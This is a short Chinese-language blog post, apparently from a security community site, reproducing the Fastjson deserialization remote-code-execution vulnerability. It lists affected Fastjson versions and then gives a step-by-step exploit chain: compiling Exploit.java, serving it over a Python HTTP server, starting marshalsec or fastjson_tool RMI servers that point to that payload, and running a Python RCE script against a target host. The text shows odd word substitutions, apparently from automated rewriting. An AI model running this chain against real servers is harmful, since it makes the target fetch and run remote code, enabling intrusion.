破绽描绘
FastJson是阿里巴巴的开源JSON解析库,它能够解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也能够从JSON字符串反序列化到JavaBean。
破绽版本
fastjson-1.2.66
fastjson-1.2.62
fastjson-1.2.47
fastjson-1.2.45
Fastjson-1.2.24
fastjson-1.2.43
fastjson-1.2.42
fastjson-1.2.41
破绽复现
https://github.com/zhzyker/exphub/tree/master/fastjson
marshalsec-0.0.3-SNAPSHOT-all.jar 启用 RMI/LDAP
编译Exploit.java生成Exploit.class
javac Exploit.java
python3 启一个 http 部署 Exploit.class
python3 -m http.server --bind 0.0.0.0 8888
marshalsec 开启 rmi
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://x.x.x.x:8888/#Exploit" 9999
fastjson_tool.jar 启用 RMI/LDAP
@wyzxxz大佬的tools整合了rmi/ldap+命令执行,
java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 9999 "touch /tmp/233"
执行py脚本
http://1.1.1.1:8080/ 为fastjson破绽主机
rmi://2.2.2.2:9999/Exploit 为rmi效劳
python3 fastjson-1.2.47_rce.py http://1.1.1.1:8080/ rmi://2.2.2.2:9999/Exploit
感谢您的来访,获取更多精彩文章请收藏本站。
© 版权声明
本站网络名称:
孤勇者社区
本站永久网址:
https://www.gyzsq.com
网站侵权说明:
本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ324470778删除处理。
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
THE END
喜欢就支持一下吧
相关推荐
评论 抢沙发
欢迎您留下宝贵的见解!